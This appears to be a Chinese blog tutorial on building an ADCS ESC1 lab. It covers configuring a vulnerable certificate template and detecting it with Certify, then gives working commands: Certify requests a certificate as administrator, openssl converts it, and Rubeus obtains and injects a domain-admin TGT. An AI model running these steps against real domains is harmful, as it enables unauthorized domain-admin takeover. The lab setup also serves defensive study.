ADCS-ESC1漏洞环境构造与利用

原理

ESC1是ADCS中的一个漏洞,利用该漏洞可实现权限提升攻击。在 ESC1 漏洞利用中,攻击者通过一系列操作获取包含域管身份信息的证书后,利用 Rubeus.exe 工具,使用该证书获取 TGT 票据。一旦成功获取 TGT 票据,攻击者就可以利用该票据进行权限提升,访问原本只有域管理员才能访问的域控资源等,从而实现对域环境的进一步控制。

漏洞利用条件

证书注册权限:Domain Users 组具备获取证书的权限。

应用程序策略:证书具备身份验证功能,例如登记为客户端身份验证,只要证书存在用于验证的相关功能,即可满足该攻击条件。

关键标志开启:开启 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 标志,此标志允许通过_CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_声明自身身份,从而实现伪装成域管理员的目的,这是 ESC1 攻击得以实施的关键步骤。

漏洞环境构造

配置证书模板

在ADCS服务器中运行中输入certtmpl.msc打开证书模板控制台,右键复制工作站身份验证

常规

模板名称设置为ESC1(可任意填写)

使用者名称

选择在请求中提供,开启CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT

拓展

选择应用程序策略,添加客户端身份验证

安全

加入Domain Users具有注册权限

发布证书模板

打开certsrv.msc

在证书颁发机构中的证书模板右键点击新建要颁发的证书模板,选择新复制的模板ESC1确定添加

漏洞环境检测

使用Certify检测有没有证书配置错误

复制代码
Certify.exe find /vulnerable

当出现以下情况时,满足 ESC1 漏洞条件,即存在 ESC1 漏洞:

  1. msPKI-Certificate-Name-Flag:ENROLLEE_SUPPLIES_SUBJECT
  2. pkiextendedkeyusage:客户端身份验证
  3. Enrollment Rights:Domain Users 组可获取证书

满足上述条件,可利用证书漏洞伪装成域管理员获取更高权限。

漏洞利用

在普通域用户下,使用Certify.exe以administrator身份申请ESC1证书

复制代码
Certify.exe request /ca:adcs.lutra.com\lutra-ADCS-CA /template:ESC1 /altname:administrator

将申请的证书复制保存为cert.pem,使用openssl转为cert.pfx,密码为空即可

复制代码
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

使用Rubeus请求域管administrator的TGT

复制代码
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /dc:192.168.110.127 /ptt

在执行的时候出现报错,KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

原因是没有将域控制器身份验证证书导入到域控中

将域控制器身份验证注册后再次执行,成功导入票据

导入票据后,已经有权限访问域控目录

相关推荐
运维有小邓@2 小时前
什么是重放攻击?如何避免成为受害者?
运维·网络·安全
夜珀3 小时前
AtomGit组织、权限与安全完全指南
安全
skilllite作者8 小时前
AI 自进化系统架构详解 (一):重新定义 L1-L3 等级,揭秘 OpenClaw 背后的安全边界
人工智能·安全·系统架构
夏冰加密软件9 小时前
【实测】文件加密软件解除保护的2种方法(以超级加密3000为例)
windows·安全
a1117769 小时前
网络安全检查表 docx 附文件
网络·安全·web安全
上海云盾商务经理杨杨10 小时前
DDoS攻击日志分析与攻击源定位实战
安全·ddos
dashizhi201513 小时前
电脑禁用U口、禁用USB端口、屏蔽移动存储设备使用的方法
windows·安全·电脑
东北甜妹14 小时前
Redis 知识总结
运维·nginx·安全
夫子樊14 小时前
资损防控与安全生产
安全
星幻元宇VR14 小时前
VR星际行走平台|沉浸式科普教育与未来体验的新入口
科技·学习·安全·生活·vr